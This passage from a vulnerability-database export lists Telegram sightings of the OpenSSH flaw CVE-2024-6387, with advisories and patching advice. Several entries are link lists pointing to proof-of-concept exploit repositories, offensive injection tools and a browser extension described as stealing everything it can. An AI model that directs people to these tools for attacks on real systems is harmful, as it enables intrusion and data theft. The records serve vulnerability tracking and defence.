\u0436\u0443\u0440\u043d\u0430\u043b \u0447\u0438\u0442\u0430\u0442\u044c  \u0442\u0443\u0442\n\nFreeBSD #OpenBSD #NetBSD #dragonFlyBSD #\u0442\u044b\u0447\u0438BSD", "creation_timestamp": "2024-07-03T00:01:23.000000Z"}, {"uuid": "4b3c5412-a2cf-4c9a-abe0-7e2c222d664d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2141", "content": "CVE-2024-6387: \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 RCE \u00abregreSSHion\u00bb\n*\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c\n*", "creation_timestamp": "2024-07-01T13:23:08.000000Z"}, {"uuid": "9c31b1eb-6d0d-49df-9cc7-a92792dffaf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/KM05aMjsOwk8Ab-p8c9yMtb3cab7axvrBz451HjzqkB9g5Bn", "content": "", "creation_timestamp": "2024-10-27T11:20:55.000000Z"}, {"uuid": "100c9ef8-502a-4764-aff0-a4be77f506a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/B9FTkdD0FmF5oByqngnOty4uF3ScsQl-YlyiYHTsLe5xB7hE", "content": "", "creation_timestamp": "2024-09-05T20:16:54.000000Z"}, {"uuid": "e2b54e12-c772-45f1-887e-93019fc5248e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/fyICTQXCXpmSDuiEb1iZIF8qH-RMIJ6A79lEQgaGPt_d27OW", "content": "", "creation_timestamp": "2024-09-05T20:15:09.000000Z"}, {"uuid": "b56674b4-9c81-4bc3-9ffd-8e454fd923a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/IOjwps_yh_BX1IhnG9MTYnhjpc2nrz2gK_oBl5RPvD1--eU", "content": "", "creation_timestamp": "2024-07-17T20:24:39.000000Z"}, {"uuid": "e0042db5-5c91-4b1e-9d6c-d639c8572e04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/0XGIDZ9d9swiWh7q97Y3HsimbV7-FxCE5wSU2h8GZWhQ8ZLQ", "content": "", "creation_timestamp": "2025-01-03T15:24:14.000000Z"}, {"uuid": "81dfe985-aeda-4687-a9d1-9bf9e22d6aa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6907", "content": "Tools - Hackers Factory \n\nGitHub - filipi86/CVE-2024-6387-Vulnerability-Checker: This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\n\nhttps://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker\n\nAuto-Gmail-Creator\n\nhttps://github.com/ai-to-ai/Auto-Gmail-Creator\n\nMalwoverview 6.0.0 has been released:\n\nhttps://github.com/alexandreborges/malwoverview\n\nGitHub - skewyapp/skewyapp: Tool to prevent eavesdropping and ultrasonic access of your smart phone.\n\nhttps://github.com/skewyapp/skewyapp\n\nk8s-sniff-https\n\nA simple mitmproxy blueprint to intercept HTTPS traffic from apps running on Kubernetes\n\n\u2192 Reverse engineer API calls or debug third party apps that performs HTTPS calls to remote SaaS backends\n\nhttps://github.com/ofirc/k8s-sniff-https\n\nGitHub - testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nhttps://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC\n\nGitHub - Pr0teus/malandres-lingo: Corretores ortogr\u00e1ficos s\u00e3o \u00f3timos para corrigir erros de digita\u00e7\u00e3o, mas tamb\u00e9m podem ser usados para alterar a nossa forma de escrever, de forma mascarar nossa personalidade.\n\nhttps://github.com/Pr0teus/malandres-lingo\n\nGitHub - LukeSmithxyz/emailwiz: Script that installs/configures a Dovecot, Postfix, Spam Assassin, OpenDKIM Debian web server\n\nhttps://github.com/LukeSmithxyz/emailwiz\n\nGitHub - hahwul/authz0: \ud83d\udd11 Authz0 is an automated authorization test tool. Unauthorized access can be identified based on URLs and Roles & Credentials.\n\nhttps://github.com/hahwul/authz0\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-12T10:15:00.000000Z"}, {"uuid": "304e4540-ffd3-44f9-adeb-951b3b0c73c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/1BUnfO_UWOcF13iPvzfERrfaN-z-uVE-WsKDRNbRTc-gu5g", "content": "", "creation_timestamp": "2024-07-02T20:09:19.000000Z"}, {"uuid": "ce44dbaa-5670-4ebf-8f87-c23c73cfbff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6875", "content": "Tools - Hackers Factory\n\nGitHub - EvilBytecode/Bloxstrap-Persistance: Bloxstrap-Persistance modifies Bloxstrap's settings (Settings.json) to add persistent integrations, showcasing how applications can be exploited.\n\nhttps://github.com/EvilBytecode/Bloxstrap-Persistance\n\nGitHub - techgaun/github-dorks: Find leaked secrets via github search\n\nhttps://github.com/techgaun/github-dorks\n\nGitHub - lachlan2k/phatcrack: Modern web-based distributed hashcracking solution, built on hashcat\n\nhttps://github.com/lachlan2k/phatcrack\n\nGitHub - MatheuZSecurity/ModTracer: ModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\nGitHub - omrikiei/ktunnel: A cli that exposes your local resources to kubernetes\n\nhttps://github.com/omrikiei/ktunnel\n\nGitHub - BrandonLynch2402/cve-2024-6387-nuclei-template\n\nhttps://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template\n\nGitHub - D3Ext/WEF: Wi-Fi Exploitation Framework\n\nhttps://github.com/D3Ext/WEF\n\nGitHub - spyboy-productions/omnisci3nt: Unveiling the Hidden Layers of the Web \u2013 A Comprehensive Web Reconnaissance Tool\n\nhttps://github.com/spyboy-productions/omnisci3nt\n\nGitHub - WerWolv/ImHex: \ud83d\udd0d A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.\n\nhttps://github.com/WerWolv/ImHex\n\nGitHub - edoardottt/csprecon: Discover new target domains using Content Security Policy\n\nhttps://github.com/edoardottt/csprecon\n\nGitHub - classvsoftware/spy-extension: A Chrome extension that will steal literally everything it can\n\nhttps://github.com/classvsoftware/spy-extension\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-06T14:48:28.000000Z"}, {"uuid": "7b6d5926-fe06-478a-bc8d-4534d9dfabcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6861", "content": "Tools - Hackers Factory\n\nA signal handler race condition in OpenSSH's server (sshd)\n\nhttps://github.com/zgzhang/cve-2024-6387-poc\n\nPrivilege Escalation Enumeration Script for Windows\n\nhttps://github.com/itm4n/PrivescCheck\n\nTwo new offensive techniques using Windows Fibers: PoisonFiber (The first remote enumeration & Fiber injection capability POC tool) PhantomThread (An evolved callstack-masking implementation)\n\nhttps://github.com/JanielDary/ImmoralFiber\n\nStatic deobfuscator for Themida/WinLicense/Code Virtualizer's mutation-based obfuscation.\n\nhttps://github.com/ergrelet/themida-unmutate\n\nExample code samples from our ScriptBlock Smuggling Blog post\n\nhttps://github.com/BC-SECURITY/ScriptBlock-Smuggling\n\nRusty Hypervisor - Windows UEFI Blue Pill Type-1 Hypervisor in Rust (Codename: Illusion)\n\nhttps://github.com/memN0ps/illusion-rs\n\nThis Burp Suite extension allows you to copy HTTP requests without including cookies or tokens. It removes sensitive information related to authentication, session management, and CSRF protection from the requests, making it easier to share or analyze them without exposing sensitive data.\n\nhttps://github.com/haticeerturk/requestCleaner\n\nGitHub - pl4int3xt/cve_2024_0044: CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13 -\n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nZyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection CVE-2024-29973\n\nhttps://github.com/momika233/CVE-2024-29973\n\nSudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing advanced automated reconnaissance (framework). This tool can also be used for OSINT (Open-source intelligence) activities.\n\nhttps://github.com/screetsec/Sudomy\n\n#CyberDilara\nhttps://t.me/CyberDilara\n\n#CyberBulletin\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-07-04T09:43:38.000000Z"}, {"uuid": "a23277b0-65d9-4c29-aa3b-7f43822f8234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/cybersecs/2895", "content": "[ regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server ]\n\nCVE-2024-6387\n\nAffected OpenSSH versions:\n\u2014 OpenSSH versions earlier than 4.4p1 are vulnerable to this signal handler race condition unless they are patched for CVE-2006-5051 and CVE-2008-4109.\n\u2014 Versions from 4.4p1 up to, but not including, 8.5p1 are not vulnerable due to a transformative patch for CVE-2006-5051, which made a previously unsafe function secure.\n\u2014 The vulnerability resurfaces in versions from 8.5p1 up to, but not including, 9.8p1 due to the accidental removal of a critical component in a function.\n\u2014 OpenBSD systems are unaffected by this bug, as OpenBSD developed a secure mechanism in 2001 that prevents this vulnerability.\n\nBlog by Qualys:\nhttps://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server\n\nCheck FAQ for any other questions and...\nUpdate ASAP (+ fail2ban)\n\nPOC: \u041d\u0410 \u0421\u0412\u041e\u0419 \u0421\u0422\u0420\u0410\u0425 \u0418 \u0420\u0418\u0421\u041a", "creation_timestamp": "2024-07-02T14:11:09.000000Z"}, {"uuid": "5adc5779-682e-4482-858a-13550a648b3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/cybersecs/2896", "content": "", "creation_timestamp": "2024-07-02T11:34:17.000000Z"}, {"uuid": "db4feef6-030d-4135-bfb8-f2682c3edbbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1233", "content": "\ud83d\udccd #\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc_\u0628\u062d\u0631\u0627\u0646\u06cc \u062f\u0631 Microsoft Edge\n\n\u0645\u0631\u0648\u0631\u06af\u0631 #Microsoft_Edge \u062f\u0631 \u062a\u0627\u0631\u06cc\u062e 2 \u0622\u06af\u0648\u0633\u062a 2024\u060c \u0642\u0631\u0628\u0627\u0646\u06cc \u0686\u0646\u062f\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u060c \u06a9\u0647 \u0628\u0627 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc CVE-2024-6990\u060c CVE-2024-7255 \u0648 CVE-2024-7256 \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0627\u0645\u06a9\u0627\u0646 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0641\u0631\u0627\u0647\u0645 \u06a9\u0631\u062f\u0647 \u0648 \u062e\u0637\u0631\u0627\u062a \u062c\u062f\u06cc \u0645\u0627\u0646\u0646\u062f #\u0627\u062c\u0631\u0627\u06cc_\u06a9\u062f_\u062f\u0644\u062e\u0648\u0627\u0647\u060c #\u0627\u0641\u0634\u0627\u06cc_\u0627\u0637\u0644\u0627\u0639\u0627\u062a_\u062d\u0633\u0627\u0633 \u0648 \u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0631\u0627 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u062f\u0627\u0631\u0646\u062f.\n\n\u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0627\u06cc\u0646 \u0645\u0631\u0648\u0631\u06af\u0631\u060c \u062a\u0645\u0627\u0645\u06cc \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0642\u0628\u0644 \u0627\u0632 127.0.2651.86 \u0647\u0633\u062a\u0646\u062f. \u0644\u0630\u0627 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0641\u0648\u0631\u06cc \u0628\u0647 \u0627\u06cc\u0646 \u0646\u0633\u062e\u0647 \u06cc\u0627 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u062c\u062f\u06cc\u062f\u062a\u0631\u060c \u062c\u0647\u062a \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646\u060c \u0642\u0648\u06cc\u0627\u064b \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\n\u062e\u0644\u0627\u0635\u0647\u200c\u0627\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627:\n- #\u0628\u0627\u06cc_\u067e\u0633 (#bypass) \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc: \u062f\u0648\u0631 \u0632\u062f\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0639\u0645\u0627\u0644 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0645\u0631\u0648\u0631\u06af\u0631.\n- #\u0627\u0641\u0634\u0627\u06cc_\u0627\u0637\u0644\u0627\u0639\u0627\u062a: \u062f\u0633\u062a\u0631\u0633\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646.\n- #\u0627\u062c\u0631\u0627\u06cc_\u06a9\u062f_\u0627\u0632_\u0631\u0627\u0647_\u062f\u0648\u0631: \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0645\u0647\u0627\u062c\u0645 \u0628\u0631 \u0631\u0648\u06cc \u0633\u06cc\u0633\u062a\u0645 \u0642\u0631\u0628\u0627\u0646\u06cc.\n- #\u0645\u062d\u0631\u0648\u0645\u06cc\u062a_\u0627\u0632_\u0633\u0631\u0648\u06cc\u0633: \u0627\u062e\u062a\u0644\u0627\u0644 \u062f\u0631 \u0639\u0645\u0644\u06a9\u0631\u062f \u0646\u0631\u0645\u0627\u0644 \u0645\u0631\u0648\u0631\u06af\u0631 \u0648 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0646\u0628\u0648\u062f\u0646 \u0622\u0646 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631.\n\n\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0636\u0631\u0648\u0631\u06cc:\n- #\u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc_\u0641\u0648\u0631\u06cc: \u0646\u0635\u0628 \u0622\u062e\u0631\u06cc\u0646 \u0646\u0633\u062e\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0645\u0631\u0648\u0631\u06af\u0631 #Microsoft_Edge.\n- #\u0645\u0631\u0627\u0642\u0628\u062a_\u0627\u0632_\u0627\u06cc\u0645\u06cc\u0644\u200c\u0647\u0627_\u0648_\u067e\u06cc\u0648\u0633\u062a\u200c\u0647\u0627: \u0627\u062c\u062a\u0646\u0627\u0628 \u0627\u0632 \u06a9\u0644\u06cc\u06a9 \u0628\u0631 \u0631\u0648\u06cc \u0644\u06cc\u0646\u06a9\u200c\u0647\u0627 \u06cc\u0627 \u062f\u0627\u0646\u0644\u0648\u062f \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9.\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0647\u200c\u0631\u0648\u0632: \u0646\u0635\u0628 \u0648 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0645\u062f\u0627\u0648\u0645 #\u0622\u0646\u062a\u06cc_\u0648\u06cc\u0631\u0648\u0633 \u0648 #\u0641\u0627\u06cc\u0631\u0648\u0627\u0644.\n- \u0645\u0631\u0627\u062c\u0639\u0647 \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u0631\u0633\u0645\u06cc: \u06a9\u0633\u0628 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u062e\u0635\u0648\u0635 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0648 \u0631\u0627\u0647\u06a9\u0627\u0631\u0647\u0627\u06cc \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u0622\u0646 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0631\u0633\u0645\u06cc #Microsoft \u0648 \u06af\u0632\u0627\u0631\u0634 #HKCERT.\n\n\u062a\u0648\u062c\u0647: \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0627\u0632 \u0627\u0647\u0645\u06cc\u062a \u0628\u0627\u0644\u0627\u06cc\u06cc \u0628\u0631\u062e\u0648\u0631\u062f\u0627\u0631 \u0628\u0648\u062f\u0647 \u0648 \u062f\u0631 \u0635\u0648\u0631\u062a \u0639\u062f\u0645 \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u0645\u0648\u0642\u0639\u060c \u0639\u0648\u0627\u0642\u0628 \u062c\u0628\u0631\u0627\u0646\u200c\u0646\u0627\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648 \u0633\u0627\u0632\u0645\u0627\u0646\u200c\u0647\u0627 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u062e\u0648\u0627\u0647\u062f \u062f\u0627\u0634\u062a.\n\n\ud83d\udd17 \u062c\u0647\u062a \u0645\u0637\u0627\u0644\u0639\u0647 \u0627\u062f\u0627\u0645\u0647 \u0645\u0642\u0627\u0644\u0647 \u0628\u0647 \u0627\u06cc\u0646 \u0633\u0627\u06cc\u062a \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f:\n\n\ud83c\udf10 https://www.hkcert.org/security-bulletin/microsoft-edge-multiple-vulnerabilities_20240802\n\n\ud83d\udccd #CriticalVulnerability CVE-2024-6387 in Moxa Products\n\nProducts from Moxa, including the EDR-8010, EDR-G9010, and OnCell G4302-LTE4 series, are facing serious risks due to vulnerability CVE-2024-6387 in OpenSSH software. This vulnerability, stemming from a race condition in the SSH service, allows attackers to execute arbitrary code with root access without authentication.\n\nVulnerability Overview:\nA race condition in the SSH service occurs when authentication fails within a specified time period (LoginGraceTime), enabling attackers to exploit this situation. This allows the execution of malicious code with the highest level of access (root) on affected devices.\n\nAffected Products:\n- Moxa EDR-8010\n- Moxa EDR-G9010\n- Moxa OnCell G4302-LTE4\n\nThese products are vulnerable if they are running firmware versions earlier than 3.12.\n\nVulnerable Versions:\nAll firmware versions below 3.12 for the affected products are at risk.\n\nNecessary Actions:\n- Immediate Update: Moxa has released updated firmware versions to address this vulnerability. Users should install these updates as soon as possible.\n- Limit SSH Access: To reduce exposure, restrict SSH access to trusted IP addresses and networks.\n- Deploy Security Systems: Using Intrusion Detection and Prevention Systems (IDS/IPS) can help identify and mitigate potential attacks.\n\nSecurity Recommendations:\n- Monitor Logs: Regularly review system logs to detect any suspicious activities.\n- Apply Least Privilege Principle: Grant users only the necessary permissions required for their tasks.\n- Update Software: Regularly update all software and operating systems to address known vulnerabilities.\n\n\ud83d\udd17  To read the full article, visit:\n\n\ud83c\udf10 https://www.moxa.com/en/support/product-support/security-advisory/mpsa-246387-multiple-moxa-product-series-affected-by-cve-2024-6387", "creation_timestamp": "2024-08-05T16:54:08.000000Z"}, {"uuid": "80204ccd-e222-4662-b7ae-58aa311bdb12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/zer0day1ab/16", "content": "#git #poc #rce", "creation_timestamp": "2024-07-01T14:45:39.000000Z"}, {"uuid": "96787246-cdca-4ced-a0d2-b5bc795d3163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/zer0day1ab/15", "content": "RegreSSHion \u2014 OpenSSH Unauthenticated RCE\n\nThe Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH\u2019s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.\n\nResearch: \nhttps://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server\n\n#openssh #glibc #rce #cve", "creation_timestamp": "2024-07-01T14:27:03.000000Z"}, {"uuid": "bfb55678-82ef-4f24-812c-4e849053370f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/true_secator/6084", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 FreeBSD \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 OpenSSH, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f RCE \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n\nCVE-2024-7589 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 7,4 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432 sshd(8) \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u043b\u044f \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u041e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f, \u043a\u043e\u0433\u0434\u0430 \u043a\u043b\u0438\u0435\u043d\u0442 \u043d\u0435 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 LoginGraceTime \u0441\u0435\u043a\u0443\u043d\u0434 (\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e 120).\n\n\u041e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 sshd(8), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0435 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043b\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\nCVE-2024-7589 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043e\u0434\u0438\u043d \u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a\u00a0regreSSHion (CVE-2024-6387), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430.\n\n\u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043d\u044b\u0439 